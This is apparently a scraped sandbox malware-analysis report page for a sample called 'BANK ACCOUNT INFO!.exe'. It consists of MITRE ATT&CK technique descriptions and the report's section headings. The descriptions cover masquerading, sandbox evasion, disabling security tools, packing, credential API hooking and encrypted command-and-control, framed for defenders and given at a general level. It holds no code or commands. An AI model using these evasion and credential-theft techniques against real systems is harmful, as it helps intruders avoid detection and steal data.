Data Sources:	BIOS, MBR, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.Unlike Keylogging , this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Loaded DLLs, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report BANK ACCOUNT INFO!.exe

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

Signature Overview

AV Detection:

Networking:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Version Infos

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTP Packets

Code Manipulations

User Modules

Hook Summary